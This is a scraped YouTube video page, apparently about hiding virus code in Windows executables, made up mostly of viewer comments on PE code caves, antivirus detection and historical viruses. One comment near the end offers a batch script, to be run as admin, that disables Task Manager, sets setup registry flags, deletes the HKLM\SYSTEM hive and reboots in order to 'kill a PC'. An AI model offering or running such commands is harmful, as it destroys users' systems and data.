I Made A Virus - I Instantly Regretted It

Поділитися
Вставка
  • Опубліковано 21 лис 2024

КОМЕНТАРІ • 80

  • @nathanbaggs
    @nathanbaggs  8 місяців тому +2

    Want early access to new videos and some behind the scenes content? Consider becoming a channel member ua-cam.com/channels/QvW_89l7f-hCMP1pzGm4xw.htmljoin

  • @extrasolar9976
    @extrasolar9976 8 місяців тому +74

    New challange: infect the Antimalware service executable

  • @AllenKll
    @AllenKll 8 місяців тому +43

    Fun tip about Mcaffee... it doesn't actually check the files. All it does is notice it is new, gets a hash of it, and send it back to McAffe's servers for a determination there. this could take days.

    • @eadweard.
      @eadweard. 8 місяців тому +1

      Why would it take days?

    • @AllenKll
      @AllenKll 8 місяців тому +2

      @@eadweard. After some initial automated checks, the file can be reviewed by a real person and determined if it is a virus or not.

    • @eadweard.
      @eadweard. 8 місяців тому

      @@AllenKll Difficult to know quite what you're saying. If you click "Scan" on an previously-unseen file, it's obviously not going to sit on "Scanning" for days while a human looks at it.

    • @AllenKll
      @AllenKll 8 місяців тому +4

      @@eadweard. No, it doesn't find it's hash in the file DB, so it gathers information, sends it off to the mcaffee servers, and tells you it's fine.

    • @Free2PlayLessPays
      @Free2PlayLessPays 8 місяців тому +1

      >lemme mail this infected file to the boss, so he can check if its alright

  • @nonessentialfungus
    @nonessentialfungus 4 місяці тому +4

    Fun fact: the notorious Chernobyl/CIH virus worked much in the way you describe: it would look for empty spaces between the executable sections and then write sections of its code into those empty spaces. Then, when an infected file was run, the virus code would reassemble those sections with some code stored between the PE header and the rest of the data.
    The reason the virus was so notorious was that its payload would DELETE YOUR BIOS, potentially rendering your machine unusable.

  • @Voxelstice
    @Voxelstice 8 місяців тому +9

    i never knew you COULD hide code in the executable without directly injecting onto the actual code
    well i guess im going to look into the portable executable format, seems interesting

  • @felipecaetano15
    @felipecaetano15 8 місяців тому +8

    Wait, what about the code digital signature? I thought it was supposed to detect modifications.

  • @JohnAlanWoods
    @JohnAlanWoods 8 місяців тому +25

    Your content is the best. I love your vids. They are so accessible and interesting yet just detailed enough to learn something new.

  • @Urpuss
    @Urpuss 8 місяців тому +5

    Would be neat for a follow up video to see how you would code an antivirus for this virus

  • @Nunya58294
    @Nunya58294 8 місяців тому +4

    I remember learning about the Portable Executable (PE) file format writing an ELF loader for my UEFI bootloader. This is a great refresher!

  • @Novacification
    @Novacification 8 місяців тому +8

    Really interesting and informative video! Always wondered how viruses are made. It's pretty fascinating what is possible when you look below the tidy surface and overcome your default mindset of wanting things to work as expected.

  • @fromthegamethrone
    @fromthegamethrone 8 місяців тому +1

    Me watching and nodding along. Mhm mhm
    I understood nothing but loved it.

  • @etusax
    @etusax 8 місяців тому +10

    Great video, very interesting! Also it’s been nice to see you grow as a content creator - the videos keep getting better and better produced.

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +4

      Thanks! It's been a lot to learn but I just try to make each video better than the last

  • @AROAH
    @AROAH 7 місяців тому

    This is actually how a lot of DOS viruses worked. One of the first ways to know a system file was infected was to verify the size, so if you can obfuscate your changes by injecting code into dummy data, you could hide in plain sight.
    And thus the cat and mouse game that is cybersecurity.

  • @b4ux1t3-tech
    @b4ux1t3-tech 7 місяців тому

    This is such a great video. A lot of folks like to play it safe and not share the "secrets" of malware development.
    The thing is, the information is all out there. There's nothing gained from hiding anything. The "bad guys" can find this information all over the place. More people knowing about it means more bad people can use it. . .but it also means more good people know how it works so that they can work to defend against it.
    As we all know, security by obscurity doesn't work.

    • @nathanbaggs
      @nathanbaggs  7 місяців тому

      Thanks! Yeah there’s nothing secret here, but I’m hoping it might be new and interesting to a lot of people

  • @haxguy0
    @haxguy0 8 місяців тому

    Love your content. Really enjoy the flow of your videos and how you walk the viewer through complex concepts.

  • @ac15cr
    @ac15cr 8 місяців тому

    This was quite an interesting and different video from your previous work. I'd love to see more of it!

  • @istvan_m
    @istvan_m 8 місяців тому

    This was very good. I read some books on Windows Internals a few years ago but never did anything as practical with the knowledge beyond normal development. Thanks for sharing!

  • @AlexKiraly
    @AlexKiraly 8 місяців тому +1

    What an underrated channel, damn!

  • @ILightWas
    @ILightWas 8 місяців тому

    ohh so good, this video was delightful. It enlightens clearly so many concepts, like a structured list to later later study more deeply knowing how they relate, THIS was what I most liked.

  • @koosa6289
    @koosa6289 5 місяців тому

    This is fasctinating and insane to me at the same time, how do people get hang of this low level stuff, seems beyond my comprehension.

    • @mattmurphy7030
      @mattmurphy7030 4 місяці тому

      It’s all written down, just learn to read documentation

    • @edwardmacnab354
      @edwardmacnab354 Місяць тому

      yeah , it seems like a ton of complex info . There's no way I'm going to be able to incorporate it all . Some people must just have a gift for this .

  • @Bobbias
    @Bobbias 8 місяців тому +1

    It would have been nice to see a virustotal result and see how many of its AVs detect you.

  • @vakqdev
    @vakqdev 8 місяців тому +53

    plot twist: this video is a virus

  • @clashblaster
    @clashblaster 8 місяців тому

    It's important to note that all the worry about ensuring the program can still execute its own code is only a concern if you're trying to create a stealthy virus that can act without alerting the user to its presence. Plenty of viruses throughout history have foregone the stealthy approach and made it obvious when the user has run an infected program.

  • @PoetofHateSpeech
    @PoetofHateSpeech 10 днів тому

    The question is, can one do something malicious to ones self?

  • @DanelonNicolas
    @DanelonNicolas 8 місяців тому

    I love it 😮 really really nice video 😍 it's awesome how easy it was dude

  • @dtlssm
    @dtlssm 8 місяців тому

    i read somewhere that now you can attack a pc from the bios logo and its nothing you can do about it!crazy

    • @freedustin
      @freedustin 8 місяців тому

      you can flash the UEFI and patch it if there is an update available (there is)
      but tbh, that vuln is not a way in, they have to have a way in first to do that.

  • @nolram
    @nolram 8 місяців тому

    All you need to trip Windows defender is downloading and executing another executable (or sometimes executing another executable at all) - something I have to fight frequently as there are many perfectly reasonable reasons to do this :)

  • @m_isho
    @m_isho 8 місяців тому +4

    In Windows Defender you can chose to ignore a threat if you think it's a false positive.
    What this video really shows is that making a zero day exploit is very doable, that antivirus programs may only see certain injections in certain code-caves that it is actively looking for.
    From a personal point of view as a user and not a developer, I would like it if every system call was prompted on screen much like the "would you like to run this program, yes or no?", but it would show a window with what folder the program wants to change and what files it wants to affect, much like when you copy files and replace them in a folder.
    The same way Android apps asks for permissions to use location, microphone or access folders, I would like executable files to ask me for permission, and that all these syscalls and permissions would have to be reviewed before granting a program permissions to change certain folders.
    One of the most annoying things with any executable program, is when it changes a file, folder or registry index without telling you what it's changing. Most installers shows a list of things it wants to install and a user can opt out of optional packages by clicking a checklist. A program or game should say promptly: "We wish to add this to your %appdata% folder" or "Install additional libraries in this location".
    Since switching to SSDs, a lot of apps chose to install ludicrous big files in the %appdata% folder, which is stored on the OS drive, and it takes up a lot of space for no reason, (looking at you Spotify). There is literally no speed benefit of putting cache in %appdata% compared to putting it in the installation folder on a normal HDD, unless the program or game specifically benefit from loading certain files from an SSD. I find myself creating symlinks from a HDD and putting it into %appdata% folders very often, just to save on space. Until I get a 1TB SSD, I won't be allowing 20GB of cache files to just collect dust on the SSD for a program I run once in a blue moon.
    Thank you for a very educational video.

  • @andersondamasceno
    @andersondamasceno 8 місяців тому

    I love videos that are for educational purposes only. They are so.... educational. :)

  • @PatrickChilton
    @PatrickChilton 8 місяців тому +6

    yer a wizard harry

  • @WebCamCartmell
    @WebCamCartmell 8 місяців тому

    Another fantastic video!

  • @thisiscentralcontrol
    @thisiscentralcontrol 6 місяців тому

    this channel is so good

  • @r4nd0mstuf
    @r4nd0mstuf 8 місяців тому

    Love your videos!

  • @HiImKyle
    @HiImKyle 8 місяців тому +3

    I don't think I've ever heard anyone pronounce EXE the way you do. Made me chuckle a lil

  • @ToniMorton
    @ToniMorton 8 місяців тому

    this is a really similar concept to win32 sality it used to bytepatch exes to run itself and was a nasty bit of kit.

  • @placeholder7852
    @placeholder7852 7 місяців тому

    9:13
    Does that mean that if you were to stick with .text instead of .reloc, windows wouldn't have found any threats?

  • @DouglasFish
    @DouglasFish 8 місяців тому

    I really love your videos

  • @FlamingPhoenix40
    @FlamingPhoenix40 8 місяців тому

    Wait, did you reupload the video with a different thumbnail/title? I'm pretty sure I've seen it on my feed before, but I didn't actually watch it yet

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +2

      You can change title and thumbnail after a video has been uploaded. It’s pretty common practice to tweak a video after upload to try and maximise the number of people who click it (called Click Through Rate or CTR)

  • @wombatpandaa9774
    @wombatpandaa9774 8 місяців тому +1

    As usual, McAfee is a total joke

    • @xanderplayz3446
      @xanderplayz3446 7 місяців тому

      And Norton; The pair also run misleading notifications that lead straight to their website; no punycode.

  • @maxmanium2032
    @maxmanium2032 8 місяців тому +5

    Do you always wear the AVGN fit in videos

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +4

      I just own a lot of white (and pink) shirts

  • @maxvandenhoven2320
    @maxvandenhoven2320 8 місяців тому +1

    Nice video! I really like your VSCode theme, would you mind sharing your setup?

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +1

      Sure - I use Dracula theme (and vim plug-in)

  • @daniel_8
    @daniel_8 8 місяців тому +1

    Always excited to watch a new video by you!

  • @ewookiis
    @ewookiis 8 місяців тому

    Into - if it replicates further, it's a worm :). Or, it's simply ads..

    • @0LoneTech
      @0LoneTech 8 місяців тому

      A worm triggers its own execution on other hosts. A virus relies on something else to execute it.

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +1

      I have a video about worms...

  • @richbrit121212
    @richbrit121212 8 місяців тому +2

    Fine. I'll put down Fortnight and watch this 😂

    • @nathanbaggs
      @nathanbaggs  8 місяців тому +2

      I make no guarantee this is more interesting than Fortnight (:

  • @Kolor-kode
    @Kolor-kode 8 місяців тому +1

    I made a virus and I went to prison.
    (oh how I wish I was joking)

  • @apu_apustaja
    @apu_apustaja 8 місяців тому

    Hello. I like you.

  • @zgolkar
    @zgolkar 8 місяців тому

    Hehehe, smart. “easIER”, yet not “easY” 😅

  • @DigitalicaEG
    @DigitalicaEG 8 місяців тому

    Video was paced way too fast for me to keep up with. Would’ve been appreciated if you slowed it down and explained things a bit more.

  • @x3vr_gt
    @x3vr_gt Місяць тому

    Ps, if you want to kill a PC, put this in a bat file
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    Taskkill /IM explorer.exe /F
    reg add HKLM\SYSTEM\Setup /v OOBEInProgress /t REG_DWORD /d 1 /f
    reg add HKLM\SYSTEM\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f
    reg add HKLM\SYSTEM\Setup /v SetupType /t REG_DWORD /d 1 /f
    reg add HKLM\SYSTEM\Setup /v SetupPhase /t REG_DWORD /d 1 /f
    reg delete HKLM\SYSTEM /f
    shutdown /r /t 0
    and run as admin
    !I AM NOT RESPONSIBLE FOR DESTORYED PCS!
    !USE AT YOUR OWN RISK!